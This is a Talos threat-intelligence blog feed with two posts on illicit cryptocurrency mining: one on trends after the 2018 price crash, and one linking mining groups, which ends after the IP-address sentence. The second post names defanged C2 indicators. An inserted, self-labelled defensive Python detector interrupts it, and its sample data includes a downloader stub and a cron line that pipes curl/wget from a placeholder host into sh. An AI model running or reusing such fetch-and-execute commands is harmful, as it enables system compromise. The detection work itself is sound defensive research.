Talos Blog (https://blog.talosintelligence.com/), Talos Group, by Cisco. Feed retrieved Wed, 19 Dec 2018 00:15:32 PST.

As Cryptocurrency Crash Continues, Will Mining Threat Follow? Published Tue, 18 Dec 2018 08:33:00 PST. Labels: cryptocurrency, cryptomining, miners, Talos.<div dir="ltr" style="text-align: left;" trbidi="on"><i>Post authored by <a href="https://www.google.com/url?q=https://twitter.com/infosec_nick&amp;sa=D&amp;ust=1545149874016000">Nick Biasini</a>.</i><br /><h3 id="h.cyznuxuk3rz4">Executive Summary</h3>As 2018 draws to a close, one technology has definitively left its mark on the year: cryptocurrencies. Digital currencies started the year out strong after a meteoric rise toward the end of 2017. Since then, it's safe to say that cryptocurrencies have had a massive impact globally, especially on the threat landscape. However, 2018 is ending on a sour note for these currencies: they have been in steady decline, ending in a sudden drop that wiped out more than 75 percent of their value from the highs of late 2017 and early 2018. <br /><br />Malicious cryptocurrency mining became adversaries' new payload of choice, a source of recurring revenue that dislodged the lump-sum payouts of threats like ransomware from the top of the threat landscape.<br /><br />But the sudden collapse of the market, after a gradual decline, raises the question of how the threat landscape would be impacted, if at all. Despite conventional wisdom, Cisco Talos hasn't seen a notable shift away from cryptocurrency mining. We have seen pockets of movement, but they have lived explicitly in the email space, where both threat distribution and botnets play a crucial role. 
As 2018 proceeded, adversaries shifted payloads in the email space away from cryptocurrency mining and toward more modular threats like Emotet and remote access trojans (RATs). Talos is also releasing <a href="https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html">another blog today</a> outlining some of the campaigns we've seen recently from some well-known actors who have a history with cryptocurrency mining.<br /><br />After reviewing the real-world impact and associated data, it appears that cryptocurrency mining is not slowing down, and if anything, could be slightly increasing in frequency for certain aspects of the landscape. As we move into 2019, it's likely that the payloads of choice will continue to diverge between different aspects of the threat landscape. Regardless, enterprises need to be prepared to deal with malicious or unauthorized cryptocurrency mining activities on their respective networks, because it's not going away — at least not yet.<br /><br /><h3 id="h.jbd1jo6zo4uu">Introduction</h3>It's clear that, as far as the threat landscape is concerned, 2018 was the year of malicious cryptocurrency mining. Cisco Talos first covered cryptocurrency mining in <a href="https://www.google.com/url?q=https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&amp;sa=D&amp;ust=1545149874018000">early 2018</a>, and again at multiple points throughout the year, including a <a href="https://www.google.com/url?q=https://talosintelligence.com/resources/59&amp;sa=D&amp;ust=1545149874018000">whitepaper discussing the threat and associated coverage</a>. In these attacks, malicious actors inject malware into systems and steal their computing power to "mine" cryptocurrencies. If done on a large scale, this kind of attack could cost enterprises a great deal of energy and resources. 
For an individual user, it could significantly slow down their computer.<br /><br />At the time, it was clear that actors had started to push quickly into primarily Monero-based cryptocurrency mining as a payload of choice. Since then, we have witnessed one of the most significant shifts in the threat landscape in years — and perhaps ever. Adversaries have gone all in on the recurring revenue model of cryptocurrency mining instead of the lump-sum gamble that ransomware provided so effectively throughout 2016 and 2017. In ransomware attacks, attackers demanded that infected users pay them a sum of money in exchange for the return of their information. With miners, the attackers see revenue on a daily basis from their activities.<br /><br />This mass migration does have its risks, however. Primary among them is the value of the currency being mined. When we first wrote about malicious cryptocurrency mining, an adversary could hope to make about $0.25 per day from a basic home computer. As of the writing of this blog, that value has cratered to a little more than $0.04 per day for that same computer. As you can imagine, this has had an impact on adversaries' bottom lines. It now takes almost six systems to create the same revenue that one generated previously. Before we get too deep into the potential impact, let's discuss the size and scope of the role that cryptocurrency mining had on the threat landscape in 2018. One of the most interesting aspects is how widely this shift was adopted across multiple different attack avenues, including spam, web and active exploitation.<br /><h3 id="h.l2gbyfr5rs7j">Spam and the mining effect</h3>One of the best indicators of how a threat is affecting the threat landscape is spam levels. Much of the spam we see on a daily basis is generated by botnets, and those botnets are undertaking that activity to generate revenue. 
This is where we have seen some shifts throughout the year of cryptocurrency mining. As the chart below shows, overall spam volume, excluding two extremely high-volume campaigns early in 2018, is down.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-Ai3vyp6oMws/XBkVyldtjLI/AAAAAAAABio/PXge2bHxBhsKmGAAMkdErDSjDgrZZ1YCwCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="525" data-original-width="912" height="230" src="https://4.bp.blogspot.com/-Ai3vyp6oMws/XBkVyldtjLI/AAAAAAAABio/PXge2bHxBhsKmGAAMkdErDSjDgrZZ1YCwCLcBGAs/s400/image1.png" width="400" /></a></div>Late in 2017 and continuing into early 2018, spam levels were dropping. Since then, they have begun to rise, and are now approaching the levels seen through most of 2017. This is indicative of shifts in botnet functionality, where some of the systems that had previously been used to send spam may have been altered to instead work on cryptocurrency mining. There have been reports throughout the past year of botnets such as Necurs experimenting with cryptocurrency mining instead of spam generation. However, there are two sides to the spam landscape, and they tell two different stories. On one side are those that control the botnets that send spam; on the other are those who use spam as a mechanism to spread their malware.<br /><br />Adversaries that deliver their malware via spam are a different demographic, and as such, the landscape appears slightly different. Early in 2018, Talos saw near-constant campaigns delivering malicious cryptocurrency miners directly or using a downloader. As the year progressed, and more recently as the price of cryptocurrencies began to waver, we are seeing adversaries push into different areas, delivering different payloads. <br /><br />Emotet became one of the big winners as cryptocurrency miners waned. 
We have seen Emotet continue to be delivered in large numbers when active. Emotet continues to be a highly effective, modular payload that contains several functions, now including <a href="https://www.google.com/url?q=https://threatpost.com/in-county-crippled-by-hurricane-water-utility-targeted-in-ransomware-attack/138327/&amp;sa=D&amp;ust=1545149874025000">ransomware</a>. These types of modular malware frameworks that allow adversaries to deliver varied payloads are going to continue to rise in popularity, as the final payload can depend on a lot of external factors. Today, when looking at the spam landscape, you do periodically see campaigns delivering miners, but they are far less common than they were earlier in 2018. Now, you are more likely to find a RAT or a modular threat like Emotet than a miner. Cryptocurrency mining has had a marked impact on the email threat landscape in 2018, but email is just one of the key indicators on the threat landscape. Next, we'll take a look at web-based attacks.<br /><h3 id="h.4dplucmybvmc">Web</h3>Web-based attacks continue to be heavily leveraged by attackers to compromise systems around the world. In previous years, exploit kits and malvertising campaigns were used to distribute ransomware and other threats to compromised systems. Since late 2016, there has been a marked decline in global exploit kit activity. Of the campaigns that remained, malicious cryptomining payloads were commonly distributed via downloaders, rather than some of the other malware that had historically been associated with these campaigns. Along with exploit kits and malvertising, cryptocurrency mining malware was also frequently seen being delivered through fake Flash Player updates. In these attacks, victims are prompted to update their version of Adobe Flash Player, but the fake "update" instead downloads a payload used to infect the system and mine cryptocurrency for cybercriminals. 
<br /><br />Likewise, "in-browser" mining such as <a href="https://www.google.com/url?q=https://coinhive.com/&amp;sa=D&amp;ust=1545149874027000">CoinHive</a> became popular, with many websites using scripts embedded in web pages that cause visitors to mine cryptocurrency in their web browsers. Cryptocurrency mining became so mainstream in 2018 that some shareware applications were even prompting users to allow them to leverage their systems to mine cryptocurrency as a way to support the application's developers. Regardless of the methodology, there is too much of an opportunity for adversaries to pass up. Malicious cryptocurrency mining can involve almost no additional communications, and in the case of in-browser or shareware-supported mining, it's as simple as "some money is better than no money." As long as there is money to be made, malicious or unauthorized cryptocurrency mining will be part of daily life on the internet. We've covered web and email; now let's turn our focus to the more active measures that adversaries take with direct exploitation.<br /><h3 id="h.vhskkl4fxig3">Active exploitation</h3>One unique aspect of malicious cryptocurrency mining is that the amount of revenue a compromised system can generate is directly related to the hardware that the system is running. Cisco Talos observed, for at least a year, as adversaries discussed the potential for malicious cryptocurrency mining and then implemented those capabilities. Talos has seen countless examples of how active exploitation can play a significant role in malicious cryptocurrency mining. <br /><br />From Apache Struts to Eternal Blue, Oracle WebLogic, and other widespread remotely exploitable bugs, adversaries have been actively exploiting systems to deliver hordes of miners. In some cases, adversaries added worming functionality — meaning the malware can self-replicate and affect other machines — to infect large swaths of machines as fast as possible. 
Regardless of the methodology, servers are a vital target for malicious cryptocurrency mining because of their increased revenue potential. This has mainly remained steady despite the volatility of the value of the currency itself. The fact remains that cryptocurrency mining generates revenue, and once an actor or group of actors has taken the time and cost to retool for a new threat, it's going to take a lot to move them off of that particular payload. If there were to be a significant global shift away from cryptocurrency mining, this is where it would likely be most noticeable. Each area of the threat landscape has been impacted in some way by cryptocurrency mining, but the real-life impacts are where enterprises are most concerned. <br /><br />For more detail on the progression of these campaigns over the past year, with a specific focus on these active exploitation campaigns, see our accompanying blog <a href="https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html">here</a>.<br /><h3 id="h.199bcyln7vsq">Real-life impact</h3>One of the best indicators of where we are with a threat is the real-life impact. For this blog, that data comes from two primary areas: the endpoint and the network. Without question, cryptocurrency mining has been the dominant threat on the threat landscape for much, if not all, of 2018. By a significant margin, the most common alert we received in 2018 was related to cryptocurrency mining, its delivery, or its propagation. What's even more interesting is that it doesn't appear to be fading, at least not yet.<br /><br />When we began looking at the data, the expectation was that the overall amount of cryptocurrency mining activity would be decreasing in recent months, but that wasn't the case. There has been a small decrease in the amount of cryptocurrency mining activity, but those decreases have been confined to a couple of areas of the threat landscape. 
The most substantial decrease has been in the number of malicious spam emails. Earlier in 2018, we would see campaigns running around the clock delivering cryptocurrency miners. By the end of 2018, that was not the case. Instead, it's threats like RATs and Emotet that are dominating that particular landscape.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-pIVp4D4SYF4/XBkWnpMqKZI/AAAAAAAABi0/LemTzGH2jzMEKKj3IFf8yTWeCcFYUhUfgCLcBGAs/s1600/120518%2BCryptomining%2BSignature%2Bv2_network.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="765" data-original-width="1459" height="332" src="https://4.bp.blogspot.com/-pIVp4D4SYF4/XBkWnpMqKZI/AAAAAAAABi0/LemTzGH2jzMEKKj3IFf8yTWeCcFYUhUfgCLcBGAs/s640/120518%2BCryptomining%2BSignature%2Bv2_network.jpg" width="640" /></a></div>As you can see, there has been some variance in the number of events from week to week over the past six months, but generally, the trend line has held, and the overall volume of alerts has not changed significantly since June 2018. <br /><br />Let's start by looking at network-based detections. In this particular circumstance, we are looking specifically at cryptocurrency mining activity on the wire, and not the delivery or propagation of the miners. This is a clean look at actual mining activity instead of distribution. Notice that if you look at the trend line, levels have increased slightly dating back to June. So despite the fact that we do not see miners being pushed at the same level, specifically in the email space, the overall mining activity remains largely static. 
This implies both long-term mining activity and the importance of active exploitation, brute forcing and web-based attacks to the threat landscape, specifically around malicious mining.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Gcqo4kawcmU/XBkWvfeHpVI/AAAAAAAABi4/R8Xh22qpmEMUoDcNpPAPLI0LDroJ5XL6ACLcBGAs/s1600/120518%2BCryptomining%2BSignature%2Bv2_endpoint.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://2.bp.blogspot.com/-Gcqo4kawcmU/XBkWvfeHpVI/AAAAAAAABi4/R8Xh22qpmEMUoDcNpPAPLI0LDroJ5XL6ACLcBGAs/s640/120518%2BCryptomining%2BSignature%2Bv2_endpoint.jpg" width="640" /></a></div>The endpoint data held steady for the most part, but it does vary more widely from one day to the next. That could be the result of systems being shut down or cleaned at irregular intervals. Regardless, you do not see any significant downward movement, including in the last month, when the price of cryptocurrencies truly cratered.<br /><h3 id="h.2yy4wjlkf9b0">Cryptocurrency price crash</h3>The real driving factor behind this potential large-scale shift is the value of cryptocurrency across the board. It reached levels in late 2017 that were not thought possible a mere six months earlier. As that rise continued, extreme interest in cryptocurrencies rose along with it. Quickly, people who had invested thousands of dollars a few years prior found themselves on the verge of becoming millionaires. This also coincided with the rise of ransomware, since cryptocurrencies are its primary method of payment.<br /><br />The benefits weren't restricted to those that adopted the new currency early on. Adversaries and businesses alike found themselves sitting on sizable chunks of digital currency. 
Bad actors that were accepting bitcoin early on saw its value increase tenfold, if not more, but there were always murmurs and skepticism around the meteoric rise in value.<br /><br />Over the past six months, the value of cryptocurrencies had begun to fade, and over the last month-plus, the values have plummeted. At this point, most of the currencies have lost at least 75 percent of their peak values, and late investors and adversaries may be paying the price.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-Ya_ebjtzMAw/XBkW2e5pErI/AAAAAAAABi8/77VXFhGMjNcIu5tRH6iqP3X065noWVjxgCLcBGAs/s1600/image8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://4.bp.blogspot.com/-Ya_ebjtzMAw/XBkW2e5pErI/AAAAAAAABi8/77VXFhGMjNcIu5tRH6iqP3X065noWVjxgCLcBGAs/s640/image8.jpg" width="640" /></a></div>Late in 2017, Bitcoin set an all-time high of nearly $20,000, and since then, it's been a steady decline to a value of less than $4,000, a decline of more than 75 percent from its peak in December 2017.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-W8pxnUpwNJQ/XBkW770gsuI/AAAAAAAABjE/VT4XkV8KFmYrHWmzbgScC9g7bPeZqx0FwCLcBGAs/s1600/image7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://1.bp.blogspot.com/-W8pxnUpwNJQ/XBkW770gsuI/AAAAAAAABjE/VT4XkV8KFmYrHWmzbgScC9g7bPeZqx0FwCLcBGAs/s640/image7.jpg" width="640" /></a></div>Monero has followed a similar path, albeit on a smaller scale. Early in 2018, Monero prices hit an all-time high of just above $470 per coin, and a steady decline has followed throughout 2018. The value has now cratered to below $55 a coin — an astonishing loss of 86 percent of its value in less than a year as of the time of writing. 
<br /><br />Although it's been a steady decline throughout the past year, the last month has been particularly brutal. Both Bitcoin and Monero have been hemorrhaging value in the past 30 days, and the effects are stark. Bitcoin has lost an improbable 40 percent of its value in the last month, only to be topped by Monero, which lost a staggering 50 percent of its value in the past 30 days.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-dvDCoamJ7cc/XBkXB4SOvgI/AAAAAAAABjM/kBBWDlykwUAMMIJOMAGxyu6rTAr-gzYDwCLcBGAs/s1600/image4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://3.bp.blogspot.com/-dvDCoamJ7cc/XBkXB4SOvgI/AAAAAAAABjM/kBBWDlykwUAMMIJOMAGxyu6rTAr-gzYDwCLcBGAs/s640/image4.jpg" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ptItfb-5NmU/XBkXG9xI21I/AAAAAAAABjU/3SB6nwCn6BAmf0x8ybTZXP4ySFz8XtUPgCLcBGAs/s1600/image3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="744" data-original-width="1459" height="326" src="https://1.bp.blogspot.com/-ptItfb-5NmU/XBkXG9xI21I/AAAAAAAABjU/3SB6nwCn6BAmf0x8ybTZXP4ySFz8XtUPgCLcBGAs/s640/image3.jpg" width="640" /></a></div>Despite its recent collapse, it's evident that cryptocurrency is here to stay and will remain a player on the threat landscape for quite some time. For adversaries using cryptocurrency for payments, such as in ransomware, the price drop doesn't have much of an effect; they simply increase the amount of coin they request to account for the decreased value.<br /><h3 id="h.mux2zxcwylnr">Future of mining</h3>Now that all the data has been discussed, the real question remains: What does this mean for the future of mining?<br /><br />The honest answer is we don't know, but there is plenty of room to speculate. 
The first thing to realize is that cryptocurrency mining is a large portion of the threat landscape, and it will continue to be, but the question is where. The tooling and methodology required to make a shift are going to be exceedingly different for a threat group doing things like active exploitation and brute forcing than for those looking to compromise average users using threats like cryptocurrency mining, RATs and banking trojans, among others. As such, the outlook for their respective landscapes differs significantly. <br /><br />Those groups that focus on active exploitation and brute forcing are all in on mining, and it will take some additional force to move them off of this payload, mainly because of the resources they've already committed. It takes time and effort to shift away from things like distributed denial-of-service and spam botnets to cryptomining. Many of these adversaries took the time and effort to make that shift and focus on mining. A decrease in the value of the currency isn't going to move them off of that. <br /><br />Additionally, it's a question of risk and opportunity. Conducting a campaign of malicious cryptocurrency mining is far less likely to draw the attention of a security team or law enforcement when compared to some of the noisier threats like ransomware, which require command and control, victim interaction and continued communications. Malicious mining, on the other hand, allows for somewhat stable revenue generation, despite the limited earning potential of any single system. Money is money, and if you are operating at scale and stealing all the resources, it's primarily profit.<br /><h3 id="h.5hs7lkuv4dld">Conclusion</h3>Malicious cryptocurrency mining is a massive part of the threat landscape in 2018 and appears poised to remain a significant player in 2019 and beyond. Despite the recent catastrophic price collapse of these currencies, it is still profitable in many circumstances. 
That does not mean that the collapse has had no impact — we've seen that it has had an impact on the volume of spam.<br /><br />The data shows that this activity has been steady for the past six months, and although there is a potential for a significant shift in the next six months, at least so far, it isn't in the data. Time will be the true wildcard in how mining lives on. Given time, adversaries may find a more attractive target, but right now, there are not many options that generate reliable income, with minimal risk, and don't require remote access to compromised systems. This is probably the biggest reason why mining isn't going anywhere: It's profitable. And because it's easy, anyone looking to make money will be drawn to it. <br /><br />The real question is: What's next? What are the threats that enterprises should be preparing for today? Modular, flexible malware is likely the path forward as the avenues for monetization continue to change and evolve. Adversaries that are driven by monetary gain stand to generate the most revenue if they profile the end system, much like downloaders can and do today. If you compromise a gaming system or a high-end server, a threat like a miner might be ideal. However, if you compromise a high-end laptop located in the U.S., you may decide ransomware is the best avenue, or if it's part of a corporate domain, just monetizing the access might be preferred. Or when compromising an average computer in a developing country, a simple bot might be best to provide a foothold to propagate an actor's malicious intentions or attack other systems and computers with an added layer of anonymity.<br /><br />Regardless, it's clear why adversaries desire this type of flexibility. 
As systems get faster and the ways that a compromised system can be monetized continue to grow, modular malware will rise in popularity.</div>Updated 2018-12-18T12:43:44-05:00. Original post: https://blog.talosintelligence.com/2018/12/cryptocurrency-future-2018.html<br /><br />Connecting the dots between recently active cryptominers. Published Tue, 18 Dec 2018 08:33:00 PST. Labels: cryptocurrency, cryptomining, miners, Talos, Threat Research.<br /><i>Post authored by <a href="https://www.google.com/url?q=https://twitter.com/chinahanddave&amp;sa=D&amp;ust=1545149724666000">David Liebenberg</a> and <a href="https://www.google.com/url?q=https://twitter.com/smugyeti&amp;sa=D&amp;ust=1545149724667000">Andrew Williams</a>.</i><br /><h3>Executive Summary</h3>Through Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors, and that this activity has netted them hundreds of thousands of U.S. dollars combined.<br /><br />This blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies. 
<br /><br />We will cover the recent activities of these actors:<br /><ul><li>Rocke — A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.</li><li>8220 Mining Group — Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.</li><li>Tor2Mine — A group that uses tor2web to proxy communications to a hidden service for command and control (C2).</li></ul>These groups have used similar TTPs, including:<br /><ul><li>Malicious shell scripts masquerading as JPEG files with the name "logo*.jpg" that install cron jobs and download and execute miners.</li><li>The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.</li><li>Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.</li><li>Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.</li><li>Tools such as XHide Process Faker, which can hide or change the name of Linux processes, and PyInstaller, which can convert Python scripts into executables.</li></ul>We were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. <br /><br />The recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. 
For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the <a href="https://www.google.com/url?q=https://www.cyberthreatalliance.org/wp-content/uploads/2018/09/CTA-Illicit-CryptoMining-Whitepaper.pdf&amp;sa=D&amp;ust=1545149724689000">illicit cryptocurrency threat</a>. However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published <a href="https://blog.talosintelligence.com/2018/12/cryptocurrency-future-2018.html">separate research today covering this trend.</a><br /><h3>Timeline of actors' campaigns</h3><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="762" src="https://3.bp.blogspot.com/-jK9gU5Z4g6M/XBkSwhst2WI/AAAAAAAABh0/WgEn6WVJ0Aogu10HmoVBx-2CnIvTrCvTACLcBGAs/s1600/image5.jpg" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Timeline of Activity</td></tr></tbody></table><h4>Introduction</h4>Illicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as by delivering remote access trojans (RATs) and other malware. 
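Two of the TTPs listed above, shell scripts stored under "logo*.jpg" names and cron jobs that download and execute such files, can be triaged from content rather than file name. The Python below is an added defender-side example, not code from the Talos post or from any of the groups it describes; the file samples, the crontab and the example.invalid host are all constructed for the demonstration.

```python
# Added example (not Talos code): content-based triage for the "script disguised
# as a JPEG" and "cron job that fetches and runs it" TTPs listed above.
# All sample data below is constructed; example.invalid is a placeholder host.
import re

JPEG_SOI = b"\xff\xd8\xff"  # Start-Of-Image marker that opens every real JPEG

# Tokens that show up in downloader scripts but never in image data.
SHELL_HINTS = re.compile(rb"(curl|wget|crontab|chmod|nohup|base64|/bin/(ba)?sh)")

# A scheduled command that downloads something named *.jpg and pipes it to sh/bash.
CRON_FETCH_EXEC = re.compile(
    r"\b(curl|wget)\b[^|\n]*?\.jpe?g\b[^|\n]*\|\s*(ba)?sh\b", re.IGNORECASE
)


def file_kind(data: bytes) -> str:
    """Classify a blob by its bytes only: 'jpeg', 'script' or 'unknown'."""
    if data.startswith(JPEG_SOI):
        return "jpeg"
    head = data.lstrip()[:512]
    if head.startswith(b"#!") or SHELL_HINTS.search(head):
        return "script"
    return "unknown"


def is_disguised_script(name: str, data: bytes) -> bool:
    """True when the file name claims an image but the content is a shell script."""
    return name.lower().endswith((".jpg", ".jpeg")) and file_kind(data) == "script"


def suspicious_cron_lines(crontab_text: str) -> list:
    """Return crontab entries that fetch a .jpg-named object and execute it."""
    return [
        line.strip()
        for line in crontab_text.splitlines()
        if not line.lstrip().startswith("#") and CRON_FETCH_EXEC.search(line)
    ]


def triage(files: dict, crontab_text: str) -> dict:
    """Run both checks; `files` maps a file name to its raw bytes."""
    return {
        "disguised_scripts": sorted(n for n, d in files.items() if is_disguised_script(n, d)),
        "cron_fetch_exec": suspicious_cron_lines(crontab_text),
    }


# Constructed samples: a genuine JPEG header, a downloader stub saved as logo4.jpg,
# and an ordinary text file that should not trigger either check.
SAMPLE_FILES = {
    "photo.jpg": JPEG_SOI + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
    "logo4.jpg": b"#!/bin/bash\n# constructed downloader stub\ncurl -fsSL http://example.invalid/xm64 -o /tmp/xm64\n",
    "notes.txt": b"quarterly numbers, nothing to see here\n",
}

# Constructed crontab: one benign backup job and one fetch-and-execute entry.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * (curl -fsSL http://example.invalid/logo4.jpg||wget -q -O- http://example.invalid/logo4.jpg)|sh
"""

if __name__ == "__main__":
    print(triage(SAMPLE_FILES, SAMPLE_CRONTAB))
```

The magic-byte check is deliberately strict (a real JPEG always opens with FF D8 FF), while the shell-token check is a heuristic that will also flag legitimate scripts, so treat its hits as leads for review rather than verdicts.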
<br /><br />Through our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly attributed to a single actor. After completing analysis of these attacks' wallets and command and control (C2) servers, we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining. <br /><br />We also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in. <br /><br />We first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs. <br /><br />We began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named "tor2mine," based on the fact that they additionally used tor2web services for C2 communications. <br /><br />We also discovered some actors that share similarities with the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. 
Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits.<br /><br /><h4>Rocke/Iron cybercrime group</h4>Cisco Talos wrote about <a href="https://www.google.com/url?q=https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html&amp;sa=D&amp;ust=1545149724706000">Rocke</a> earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure. <br /><br />In the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted <a href="https://www.google.com/url?q=https://www.f5.com/labs/articles/threat-intelligence/new-jenkins-campaign-hides-malware--kills-competing-crypto-miner&amp;sa=D&amp;ust=1545149724712000">Jenkins </a>and <a href="https://www.google.com/url?q=https://www.alibabacloud.com/blog/jbossminer-mining-malware-analysis_593804&amp;sa=D&amp;ust=1545149724712000">JBoss</a> servers, continuing to rely on malicious Git repositories, as well as malicious <a href="https://www.google.com/url?q=https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/&amp;sa=D&amp;ust=1545149724714000">Amazon Machine Images</a>. 
They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware <a href="https://www.google.com/url?q=https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/&amp;sa=D&amp;ust=1545149724714000">capabilities</a>. Several campaigns used the XHide Process Faker tool. <br /><br />We have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn. <br /><br />The dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files.<br /><br />While keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called <a href="https://www.google.com/url?q=https://github.com/MRdoulestar/whatMiner&amp;sa=D&amp;ust=1545149724720000">whatMiner</a>, developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. 
The readme for the project describes it as "collecting and integrating all different kinds of illicit mining malware."<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="435" data-original-width="959" height="289" src="https://1.bp.blogspot.com/-G3Rbkg_o3Mc/XBkTFOJxe5I/AAAAAAAABh8/BWe5f_IQcIkJPH7e45o9Rzvyyb1Zzq1bQCLcBGAs/s640/image2.png" width="640" /></a></div><h4>Git repository for whatMiner</h4>Looking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages containing Base64-encoded scripts that download and execute miners and backdoors onto victims' machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one.<br /><br />While looking through this repository, we found a folder called "sustes." There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots under the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet.<br /><br />Many of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. 
